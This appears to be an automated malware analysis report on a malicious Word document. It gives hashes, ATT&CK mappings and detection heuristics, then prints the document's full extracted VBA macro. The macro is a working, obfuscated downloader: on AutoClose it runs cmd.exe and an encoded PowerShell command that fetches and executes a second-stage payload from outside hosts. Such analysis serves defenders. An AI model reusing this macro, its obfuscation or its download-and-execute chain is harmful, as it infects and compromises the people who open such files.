Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 125d92660260e198…

MALICIOUS

Office (OLE)

Size: 87.0 KB
Created: 2018-04-19 18:59:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: c8ed326cb3fdc56bfa6ddd406fd50dcb
SHA-1: b594bca095b0cc8e263f0575df43a0c08a67439c
SHA-256: 125d92660260e198746109a445595a377ac5d33733885464d8cbfee00213ca2c
Risk Score: 290

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1203 Exploitation for Client Execution

The sample contains VBA macros with an AutoClose event, which executes automatically when the document is closed. The script calls cmd.exe with a heavily obfuscated command (caret-escaped, with key characters assembled via Chr() arithmetic) that appears to launch PowerShell with an encoded command (-EC). This indicates the document's primary purpose is to download and execute a second-stage payload.

Heuristics (9)

  • ClamAV: Doc.Downloader.00536d-6720548-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.00536d-6720548-0
  • VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA (critical) OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    voNYpuXEjiEQERavOsIwYNQuvApANyVUiac_5(1) = LelmukUtfEjEgeQd & CStr("5723")
      Call IsError(VBA.Interaction.Shell(Trim(Join(Array(WyJodAMiKuDirelupejyzOlUBenuSubBAcUdESOhuDoR, WOKatOKEzaiwETEgUTYsoqejITexIHAroQEBU, keSNuZjeFEnUdEBXiDUHUqiJYBa, sULOsiREqAZuCoJEmlmAbiTEZehiz), "")), (12 - (6 * 2))))
  • cmd.exe reference in VBA (high) OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
    MTuaAvvOHuRPUXFawadOxIfoJUlYrU_2(1) = mlomfibywIzAPojIMu & CStr("4251")
    WyJodAMiKuDirelupejyzOlUBenuSubBAcUdESOhuDoR = "cmd.exe /c P^" + Chr(1 + 10 + (75) + 25) + "^W^e^r^s^" + Chr(2 + (35 * 2)) + "^e^L^L^.^e^x^e^ ^-^E^C^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^" + Chr(2 + (35 * 2)) + "^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^" + Chr(1 + 10 + (75) + 25) + "^A^C^I^A^a^A^B^0^A^" + Chr(2 + (35 * 2)) + "^Q^A …
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Close macro (low) OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Const jUNoGeaxECUmRyqoPygiJUV = 0
    Sub AutoClose()
    On Error Resume Next
  • Suspicious cmd.exe invocation with execution flag (high) SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8350 bytes
SHA-256: d6b3b0fb6c5d656d037f31e82915822f7703f0f4f8baedecef0f1f3083eb43c1
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const jUNoGeaxECUmRyqoPygiJUV = 0
Sub AutoClose()
On Error Resume Next
Dim pumIAsiMIMIRaiERUdKoWEvIDiNiDU(2)
Dim pumIAsiMIMIRaiERUdKoWEvIDiNiDU_4(2)
If InStr(4, "FCABehIjUFigADeXULiZD", "pumIAsiMIMIRaiERUdKoWEvIDiNiDU") Then
  pumIAsiMIMIRaiERUdKoWEvIDiNiDU(0) = InStrRev("FCABehIjUFigADeXULiZD", "pumIAsiMIMIRaiERUdKoWEvIDiNiDU")
  IsError CVErr(8867)
End If
IsError CVErr(114)
If Len(Oct(8867)) > 4 Then
 pumIAsiMIMIRaiERUdKoWEvIDiNiDU(1) = Hex(11 ^ 4)
End If
pumIAsiMIMIRaiERUdKoWEvIDiNiDU_4(0) = Now
VarType IsNumeric(CInt("8867"))
pumIAsiMIMIRaiERUdKoWEvIDiNiDU_4(1) = FCABehIjUFigADeXULiZD & CStr("8867")
Dim MTuaAvvOHuRPUXFawadOxIfoJUlYrU(2)
Dim MTuaAvvOHuRPUXFawadOxIfoJUlYrU_2(2)
If InStr(2, "mlomfibywIzAPojIMu", "MTuaAvvOHuRPUXFawadOxIfoJUlYrU") Then
  MTuaAvvOHuRPUXFawadOxIfoJUlYrU(0) = InStrRev("mlomfibywIzAPojIMu", "MTuaAvvOHuRPUXFawadOxIfoJUlYrU")
  IsError CVErr(4251)
End If
IsError CVErr(112)
If Len(Oct(4251)) > 2 Then
 MTuaAvvOHuRPUXFawadOxIfoJUlYrU(1) = Hex(11 ^ 2)
End If
MTuaAvvOHuRPUXFawadOxIfoJUlYrU_2(0) = Now
VarType IsNumeric(CInt("4251"))
MTuaAvvOHuRPUXFawadOxIfoJUlYrU_2(1) = mlomfibywIzAPojIMu & CStr("4251")
WyJodAMiKuDirelupejyzOlUBenuSubBAcUdESOhuDoR = "cmd.exe /c P^" + Chr(1 + 10 + (75) + 25) + "^W^e^r^s^" + Chr(2 + (35 * 2)) + "^e^L^L^.^e^x^e^ ^-^E^C^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^" + Chr(2 + (35 * 2)) + "^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^" + Chr(1 + 10 + (75) + 25) + "^A^C^I^A^a^A^B^0^A^" + Chr(2 + (35 * 2)) + "^Q^A^c^A^A^6^A^C^8^A^L^w^B^0^A^G^U^A^Z^Q^B^i^A^G^U^A^c^g^B^y^A^G^U^A^c^w^B^i^A^C^4^A^Y^w^B^v^A^G^0^A^L^w^B^S^A^F^U^A^S^Q^A^v^A^G^w^A^Z^Q^B^2^A^G^8^A^b^g^B^k^A^C^4^A^c^A^B^" + Chr(1 + 10 + (75) + 25) + "^A^" + Chr(2 + (35 * 2)) + "^A"

WOKatOKEzaiwETEgUTYsoqejITexIHAroQEBU = "^A^P^w^B^s^A^D^0^A^b^Q^B^1^A^G^w^A^d^A^B^v^A^D^Q^A^L^g^B^4^A^G^E^A^c^A^A^i^A^C^w^A^I^A^A^k^A^G^U^A^b^g^B^2^A^D^" + Chr(1 + 10 + (75) + 25) + "^A^Q^Q^B^Q^A^F^A^A^R^A^B^B^A^F^Q^A^Q^Q^A^g^A^C^s^A^I^A^A^n^A^F^w^A^M^g^A^2^A^D^I^A^M^Q^B^h^A^D^A^A^M^g^A^x^A^C^4^A^Z^Q^B^4^A^G^U^A^J^w^A^p^A^D^s^A^I^A^B^T^A^" + Chr(2 + (35 * 2)) + "^Q^A^Y^Q^B^y^A^" + Chr(2 + (35 * 2)) + "^Q^A^L^Q^B^Q^A^" + Chr(2 + (35 * 2)) + "^I^A^b^w^B^j^A^G^U^A^c^w^B^z^A^C^A^A^J^A^B^l^A^G^4^A^d^g^A^6^A^E^E^A^U^A^B^Q^A^E^Q^A^Q^Q^B^U^A^E^E^A^J^w^B^c^A^D^I^A^N^g^A^y^A^D^E^A^Y^Q^A^w^A^D^I^A^M^Q^A^u^A^G^U^A^e^A^B^l^A^C^c^A^O^w^A^g^A^C"


Dim NukFyGYByZUnuQOlFytYPiqerIgEni(2)
Dim NukFyGYByZUnuQOlFytYPiqerIgEni_2(2)
If InStr(2, "PIDnIgUwOhET", "NukFyGYByZUnuQOlFytYPiqerIgEni") Then
  NukFyGYByZUnuQOlFytYPiqerIgEni(0) = InStrRev("PIDnIgUwOhET", "NukFyGYByZUnuQOlFytYPiqerIgEni")
  IsError CVErr(6466)
End If
IsError CVErr(132)
If Len(Oct(6466)) > 2 Then
 NukFyGYByZUnuQOlFytYPiqerIgEni(1) = Hex(13 ^ 2)
End If
NukFyGYByZUnuQOlFytYPiqerIgEni_2(0) = Now
VarType IsNumeric(CInt("6466"))
NukFyGYByZUnuQOlFytYPiqerIgEni_2(1) = PIDnIgUwOhET & CStr("6466")
keSNuZjeFEnUdEBXiDUHUqiJYBa = "^A^A^S^Q^B^F^A^F^g^A^K^A^A^" + Chr(1 + 10 + (75) + 25) + "^A^E^4^A^Z^Q^B^3^A^C^0^A^T^w^B^i^A^G^" + Chr(1 + 10 + (75) + 25) + "^A^Z^Q^B^j^A^" + Chr(2 + (35 * 2)) + "^Q^A^I^A^B^T^A^" + Chr(2 + (35 * 2)) + "^k^A^c^w^B^0^A^G^U^A^b^Q^A^u^A^E^4^A^Z^Q^B^0^A^C^4^A^V^w^B^l^A^G^I^A^Q^w^B^s^A^G^k^A^Z^Q^B^u^A^" + Chr(2 + (35 * 2)) + "^Q^A^K^Q^A^u^A^E^Q^A^b^w^B^3^A^G^4^A^b^A^B^v^A^G^E^A^Z^A^B^T^A^" + Chr(2 + (35 * 2)) + "^Q^A^c^g^B^p^A^G^4^A^Z^w^A^" + Chr(1 + 10 + (75) + 25) + "^A^C^I^A^a^A^B^0^A^" + Chr(2 + (35 * 2)) + "^Q^A^c^A^A^6^A^C^8^A^L^w^A^1^A^D^Q^A^L^g^A^z^A^D^k^A^L^g^A^3^A^D^Q^A^L^g^A^x^A^D^I^A^N^A^A^v^A^G^w^A^Z^Q^B^2^A^G^8^A^b^g^B^k^A^C^4^A^c^A^B^" + Chr(1 + 10 + (75) + 25) + "^A^" + Chr(2 + (35 * 2)) + "^A^A^I^g^A^p^A^C^k^A^O^w^A^g^A^E^U^A^e^A^B^p^A"

Dim XYWACEHAcAWorUSUWUxobpJaJYSaKUWoHedUB(2)
Dim XYWACEHAcAWorUSUWUxobpJaJYSaKUWoHedUB_4(2)
If InStr(4, "xylIsURUVYino", "XYWACEHAcAWorUSUWUxobpJaJYSaKUWoHedUB") Then
  XYWACEHAcAWorUSUWUxobpJaJYSaKUWoHedUB(0) = InStrRev("xylIsURUVYino", "XYWACEHAcAWorUSUWUxobpJaJYSaKUWoHedUB")
  IsError CVErr(9334)
End If
IsError CVErr(124)
If Len(Oct(9334)) > 4 Then
 XYWACEHAcAWorUSUWUxobpJaJYSaKUWoHedUB(1) = Hex(12 ^ 4)
End If
XYWACEHAcAWorUSUWUxobpJaJYSaKUWoHedUB_4(0) = Now
VarType IsNumeric(CInt("9334"))
XYWACEHAcAWorUSUWUxobpJaJYSaKUWoHedUB_4(1) = xylIsURUVYino & CStr("9334")

sULOsiREqAZuCoJEmlmAbiTEZehiz = "^" + Chr(2 + (35 * 2)) + "^Q^A"
Dim RAWuXIleFoWoviaiIdOrOxeWOnISoBc(2)
Dim RAWuXIleFoWoviaiIdOrOxeWOnISoBc_4(2)
If InStr(4, "FaxAPOVEiorusunI", "RAWuXIleFoWoviaiIdOrOxeWOnISoBc") Then
  RAWuXIleFoWoviaiIdOrOxeWOnISoBc(0) = InStrRev("FaxAPOVEiorusunI", "RAWuXIleFoWoviaiIdOrOxeWOnISoBc")
  IsError CVErr(1433)
End If
IsError CVErr(114)
If Len(Oct(1433)) > 4 Then
 RAWuXIleFoWoviaiIdOrOxeWOnISoBc(1) = Hex(11 ^ 4)
End If
RAWuXIleFoWoviaiIdOrOxeWOnISoBc_4(0) = Now
VarType IsNumeric(CInt("1433"))
RAWuXIleFoWoviaiIdOrOxeWOnISoBc_4(1) = FaxAPOVEiorusunI & CStr("1433")


Dim VOCIWIAxyiTIriQydETiFIkyTaSoPUsegA(2)
Dim VOCIWIAxyiTIriQydETiFIkyTaSoPUsegA_1(2)
If InStr(1, "JaRenAsEbaa", "VOCIWIAxyiTIriQydETiFIkyTaSoPUsegA") Then
  VOCIWIAxyiTIriQydETiFIkyTaSoPUsegA(0) = InStrRev("JaRenAsEbaa", "VOCIWIAxyiTIriQydETiFIkyTaSoPUsegA")
  IsError CVErr(6435)
End If
IsError CVErr(111)
If Len(Oct(6435)) > 1 Then
 VOCIWIAxyiTIriQydETiFIkyTaSoPUsegA(1) = Hex(11 ^ 1)
End If
VOCIWIAxyiTIriQydETiFIkyTaSoPUsegA_1(0) = Now
VarType IsNumeric(CInt("6435"))
VOCIWIAxyiTIriQydETiFIkyTaSoPUsegA_1(1) = JaRenAsEbaa & CStr("6435")
Call labYTeaiTEPuDIDYXYqIJOfidUNSoDANyvydoWo(WyJodAMiKuDirelupejyzOlUBenuSubBAcUdESOhuDoR & "", WOKatOKEzaiwETEgUTYsoqejITexIHAroQEBU + CStr(""), keSNuZjeFEnUdEBXiDUHUqiJYBa, "dhdos28sjdkslsm", sULOsiREqAZuCoJEmlmAbiTEZehiz)
Dim vqyPwaCiinoKoHobApAGZIgoxeGoxYBiwA(2)
Dim vqyPwaCiinoKoHobApAGZIgoxeGoxYBiwA_6(2)
If InStr(6, "WoiebypOQeqU", "vqyPwaCiinoKoHobApAGZIgoxeGoxYBiwA") Then
  vqyPwaCiinoKoHobApAGZIgoxeGoxYBiwA(0) = InStrRev("WoiebypOQeqU", "vqyPwaCiinoKoHobApAGZIgoxeGoxYBiwA")
  IsError CVErr(3849)
End If
IsError CVErr(116)
If Len(Oct(3849)) > 6 Then
 vqyPwaCiinoKoHobApAGZIgoxeGoxYBiwA(1) = Hex(11 ^ 6)
End If
vqyPwaCiinoKoHobApAGZIgoxeGoxYBiwA_6(0) = Now
VarType IsNumeric(CInt("3849"))
vqyPwaCiinoKoHobApAGZIgoxeGoxYBiwA_6(1) = WoiebypOQeqU & CStr("3849")

End Sub
Sub labYTeaiTEPuDIDYXYqIJOfidUNSoDANyvydoWo(WyJodAMiKuDirelupejyzOlUBenuSubBAcUdESOhuDoR, WOKatOKEzaiwETEgUTYsoqejITexIHAroQEBU, keSNuZjeFEnUdEBXiDUHUqiJYBa, qOnucIVyQufjeLOJoMucIaAminyv, sULOsiREqAZuCoJEmlmAbiTEZehiz)
On Error Resume Next

  
Dim voNYpuXEjiEQERavOsIwYNQuvApANyVUiac(2)
Dim voNYpuXEjiEQERavOsIwYNQuvApANyVUiac_5(2)
If InStr(5, "LelmukUtfEjEgeQd", "voNYpuXEjiEQERavOsIwYNQuvApANyVUiac") Then
  voNYpuXEjiEQERavOsIwYNQuvApANyVUiac(0) = InStrRev("LelmukUtfEjEgeQd", "voNYpuXEjiEQERavOsIwYNQuvApANyVUiac")
  IsError CVErr(5723)
End If
IsError CVErr(125)
If Len(Oct(5723)) > 5 Then
 voNYpuXEjiEQERavOsIwYNQuvApANyVUiac(1) = Hex(12 ^ 5)
End If
voNYpuXEjiEQERavOsIwYNQuvApANyVUiac_5(0) = Now
VarType IsNumeric(CInt("5723"))
voNYpuXEjiEQERavOsIwYNQuvApANyVUiac_5(1) = LelmukUtfEjEgeQd & CStr("5723")
  Call IsError(VBA.Interaction.Shell(Trim(Join(Array(WyJodAMiKuDirelupejyzOlUBenuSubBAcUdESOhuDoR, WOKatOKEzaiwETEgUTYsoqejITexIHAroQEBU, keSNuZjeFEnUdEBXiDUHUqiJYBa, sULOsiREqAZuCoJEmlmAbiTEZehiz), "")), (12 - (6 * 2))))


Dim VACEaoHohaSeUpujOqiGytbAbEKARAKoHYveW(2)
Dim VACEaoHohaSeUpujOqiGytbAbEKARAKoHYveW_7(2)
If InStr(7, "JEDekYZeqiB", "VACEaoHohaSeUpujOqiGytbAbEKARAKoHYveW") Then
  VACEaoHohaSeUpujOqiGytbAbEKARAKoHYveW(0) = InStrRev("JEDekYZeqiB", "VACEaoHohaSeUpujOqiGytbAbEKARAKoHYveW")
  IsError CVErr(1233)
End If
IsError CVErr(127)
If Len(Oct(1233)) > 7 Then
 VACEaoHohaSeUpujOqiGytbAbEKARAKoHYveW(1) = Hex(12 ^ 7)
End If
VACEaoHohaSeUpujOqiGytbAbEKARAKoHYveW_7(0) = Now
VarType IsNumeric(CInt("1233"))
VACEaoHohaSeUpujOqiGytbAbEKARAKoHYveW_7(1) = JEDekYZeqiB & CStr("1233")

End Sub